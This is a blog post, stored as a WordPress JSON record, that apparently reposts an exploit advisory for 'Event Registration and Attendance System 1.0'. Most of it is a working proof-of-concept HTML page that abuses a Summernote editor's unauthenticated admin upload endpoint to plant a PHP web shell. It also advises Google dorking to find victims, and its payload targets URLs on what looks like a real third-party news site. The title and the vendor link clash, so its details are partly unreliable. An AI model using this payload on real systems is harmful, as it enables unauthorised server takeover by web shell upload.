{"id":59028,"date":"2024-08-20T20:49:51","date_gmt":"2024-08-20T17:49:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180245\/eras10-exec.txt"},"modified":"2024-08-20T20:49:51","modified_gmt":"2024-08-20T17:49:51","slug":"event-registration-and-attendance-system-1-0-code-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/event-registration-and-attendance-system-1-0-code-injection\/","title":{"rendered":"Event Registration and Attendance System 1.0 Code Injection"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Event Registration and Attendance System 1.0 WYSIWYG code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : Windows 10 Fr(Pro) \/ browser : Mozilla Firefox 128.0.3 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/online-news-portal.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking in Google or other search engine.<\/p>\n[+] infected item : admin_class.php<\/p>\n<p>$data .= &#8220;, content = &#8216;&#8221;.htmlentities(str_replace(&#8220;&#8216;&#8221;,&#8221;&amp;#x2019;&#8221;,$content)).&#8221;&#8216; &#8220;;<br \/>if(!empty($_FILES[&#8216;cover&#8217;][&#8216;tmp_name&#8217;])){<br \/>$fname = strtotime(date(&#8220;Y-m-d H:i&#8221;)).&#8221;_&#8221;.(str_replace(&#8221; &#8220;,&#8221;-&#8220;,$_FILES[&#8216;cover&#8217;][&#8216;name&#8217;]));<br \/>$move = move_uploaded_file($_FILES[&#8216;cover&#8217;][&#8216;tmp_name&#8217;],&#8217;..\/assets\/uploads\/content_images\/&#8217;. 
$fname);<br \/>$protocol = strtolower(substr($_SERVER[&#8220;SERVER_PROTOCOL&#8221;],0,5))==&#8217;https&#8217;?&#8217;https&#8217;:&#8217;http&#8217;;<br \/>$hostName = $_SERVER[&#8216;HTTP_HOST&#8217;];<br \/>$path =explode(&#8216;\/&#8217;,$_SERVER[&#8216;PHP_SELF&#8217;]);<br \/>$currentPath = &#8216;\/&#8217;.$path[1]; <br \/>if($move){<br \/>$data .= &#8220;, cover_img=&#8217;$fname&#8217; &#8220;;<br \/>}<br \/>}<\/p>\n[+] Line 27 : Set your target URL.<\/p>\n[+] This payload is WYSIWYG-based: the page can be edited remotely and a malicious executable file can be uploaded via Summernote, a WYSIWYG editor (version 0.8.18).<\/p>\n[+] Save the payload as poc.html <\/p>\n[+] payload : <\/p>\n<p>&lt;!DOCTYPE html&gt;<br \/>&lt;html lang=&#8221;en&#8221;&gt;<br \/>&lt;head&gt;<br \/>&lt;meta charset=&#8221;UTF-8&#8243;&gt;<br \/>&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width, initial-scale=1.0&#8243;&gt;<br \/>&lt;title&gt;Manage About Page&lt;\/title&gt;<br \/>&lt;!&#8211; Include Summernote CSS and jQuery &#8211;&gt;<br \/>&lt;link href=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;link href=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/summernote\/0.8.18\/summernote-bs4.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;script src=&#8221;https:\/\/code.jquery.com\/jquery-3.5.1.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;script src=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/js\/bootstrap.bundle.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;script src=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/summernote\/0.8.18\/summernote-bs4.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;\/head&gt;<br \/>&lt;body&gt;<br \/>&lt;div class=&#8221;container mt-5&#8243;&gt;<br \/>&lt;div class=&#8221;col-lg-12&#8243;&gt;<br \/>&lt;div class=&#8221;card card-outline card-primary&#8221;&gt;<br \/>&lt;div class=&#8221;card-body&#8221;&gt;<br 
\/>&lt;form action=&#8221;&#8221; id=&#8221;manage-about&#8221;&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;textarea name=&#8221;content&#8221; id=&#8221;content&#8221; cols=&#8221;30&#8243; rows=&#8221;10&#8243; class=&#8221;summernote2 form-control&#8221;&gt;<br \/>&lt;p style=&#8221;margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: &#8216;Open Sans&#8217;, Arial, sans-serif; font-size: 14px;&#8221;&gt;indoushka.&lt;\/p&gt;<br \/>&lt;\/textarea&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/form&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;card-footer border-top border-info&#8221;&gt;<br \/>&lt;div class=&#8221;d-flex w-100 justify-content-center align-items-center&#8221;&gt;<br \/>&lt;button class=&#8221;btn btn-flat bg-gradient-primary mx-2&#8243; form=&#8221;manage-about&#8221;&gt;Save&lt;\/button&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<\/p>\n<p>&lt;script&gt;<br \/>$(document).ready(function(){<br \/>\/\/ Initialize Summernote Editor<br \/>$(&#8216;.summernote2&#8217;).summernote({<br \/>height: 300,<br \/>toolbar: [<br \/>[&#8216;style&#8217;, [&#8216;style&#8217;]],<br \/>[&#8216;font&#8217;, [&#8216;bold&#8217;, &#8216;italic&#8217;, &#8216;underline&#8217;, &#8216;strikethrough&#8217;, &#8216;superscript&#8217;, &#8216;subscript&#8217;, &#8216;clear&#8217;]],<br \/>[&#8216;fontname&#8217;, [&#8216;fontname&#8217;]],<br \/>[&#8216;fontsize&#8217;, [&#8216;fontsize&#8217;]],<br \/>[&#8216;color&#8217;, [&#8216;color&#8217;]],<br \/>[&#8216;para&#8217;, [&#8216;ol&#8217;, &#8216;ul&#8217;, &#8216;paragraph&#8217;, &#8216;height&#8217;]],<br \/>[&#8216;table&#8217;, [&#8216;table&#8217;]],<br \/>[&#8216;insert&#8217;, [&#8216;link&#8217;, &#8216;picture&#8217;]],<br \/>[&#8216;view&#8217;, [&#8216;undo&#8217;, &#8216;redo&#8217;, &#8216;fullscreen&#8217;, &#8216;codeview&#8217;, &#8216;help&#8217;]]],<br 
\/>callbacks: {<br \/>onImageUpload: function(files) {<br \/>saveImg(files[0]); \/\/ Handle image upload<br \/>}<br \/>}<br \/>});<\/p>\n<p>\/\/ Function to save uploaded image<br \/>function saveImg(_file) {<br \/>var data = new FormData();<br \/>data.append(&#8220;file&#8221;, _file);<br \/>$.ajax({<br \/>data: data,<br \/>type: &#8220;POST&#8221;,<br \/>url: &#8220;http:\/\/www.news.witnessradio.org\/admin\/ajax.php?action=save_image&#8221;,<br \/>cache: false,<br \/>contentType: false,<br \/>processData: false,<br \/>success: function(resp) {<br \/>var image = $(&#8216;&lt;img&gt;&#8217;).attr(&#8216;src&#8217;, resp);<br \/>$(&#8216;.summernote2&#8217;).summernote(&#8220;insertNode&#8221;, image[0]);<br \/>}<br \/>});<br \/>}<br \/>});<\/p>\n<p>\/\/ Form Submission<br \/>$(&#8216;#manage-about&#8217;).submit(function(e) {<br \/>e.preventDefault();<br \/>start_load(); \/\/ Start a loading indicator (you need to define this function)<br \/>$.ajax({<br \/>url: &#8216;http:\/\/www.news.witnessradio.org\/admin\/ajax.php?action=save_about&#8217;,<br \/>data: new FormData($(this)[0]),<br \/>cache: false,<br \/>contentType: false,<br \/>processData: false,<br \/>method: &#8216;POST&#8217;,<br \/>type: &#8216;POST&#8217;,<br \/>success: function(resp) {<br \/>if(resp == 1) {<br \/>alert_toast(&#8216;Data successfully saved&#8217;, &#8220;success&#8221;);<br \/>end_load(); \/\/ End the loading indicator (you need to define this function)<br \/>}<br \/>}<br \/>});<br \/>});<\/p>\n<p>\/\/ Optional: Define start_load and end_load functions<br \/>function start_load() {<br \/>\/\/ Add your loading indicator logic here<br \/>}<\/p>\n<p>function end_load() {<br \/>\/\/ Remove your loading indicator logic here<br \/>}<\/p>\n<p>function alert_toast(message, type) {<br \/>alert(message); \/\/ Basic alert. 
Replace with a better toast notification if needed.<br \/>}<br \/>&lt;\/script&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/p>\n[+] path of evil : http:\/\/127.0.0.1\/news_portal\/assets\/uploads\/content_images\/shell.php<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Event Registration and Attendance System 1.0 WYSIWYG code injection Vulnerability || # Author : indoushka || # Tested on : Windows 10 Fr(Pro) \/ browser : Mozilla Firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/online-news-portal.zip |============================================================================================================================================= poc : [+] Dorking in Google or other search engine. 
[+] infected item : &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59028","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59028","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59028"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59028\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}